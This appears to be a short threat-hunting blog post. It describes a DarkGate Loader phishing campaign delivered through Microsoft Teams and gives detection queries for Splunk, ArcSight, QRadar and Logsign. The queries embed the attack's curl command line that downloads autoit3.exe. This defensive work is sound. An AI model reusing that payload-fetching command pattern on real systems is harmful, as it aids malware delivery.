DarkGate Loader Malware — MS Teams Attack Detected (Splunk, ArcSight, QRadar, Logsign)
A new Phishing campaign was recently detected spreading through Microsoft Teams. Microsoft Teams users were tricked by social engineering techniques and became victims of phishing after downloading a set of .ZIP files. When the attached mail is clicked and opened, a PDF appears and a LNK file appears.
In order to avoid detection, the hackers start the propagation of DarkGate Loader Malware by running the autoIT script, which is a 4th party application and is not actually included in Windows by default, using Windows CurL commands in the relevant pdf file.
So far so good. So how do we hunt it?
I have created Alarm scripts for you to create and customize Alarms in your SIEM products. You can customize it for yourself and reduce the False-Positive rate.
SPLUNK Alerts Query;
index=* source=”WinEventLog:*” AND (CommandLine=”*copy c:\\windows\\system32\\curl.exe *user-agent: curl* -o autoit3.exe*”)
ArcSight Alerts Query;
((destinationServiceName CONTAINS “”copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe”” OR deviceCustomString4 CONTAINS “”copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe””)) AND type != 2 | rex field = flexString1 mode=sed “s//Sigma: DarkGate/g”
IBM QRadar Alerts Query;
SELECT UTF8(payload) FROM events WHERE LOGSOURCETYPENAME(devicetype)=’Microsoft Windows Security Event Log’ AND CATEGORYNAME(category)=’Process Creation Success’ AND (“Process CommandLine” ILIKE ‘%copy c:\windows\system32\curl.exe %user-agent: curl% -o autoit3.exe%’)
LogSign SIEM Alerts Query;
EventVendor.Product:”Microsoft” Process.CommandLine:”autoit3.exe”
Good Hunting.
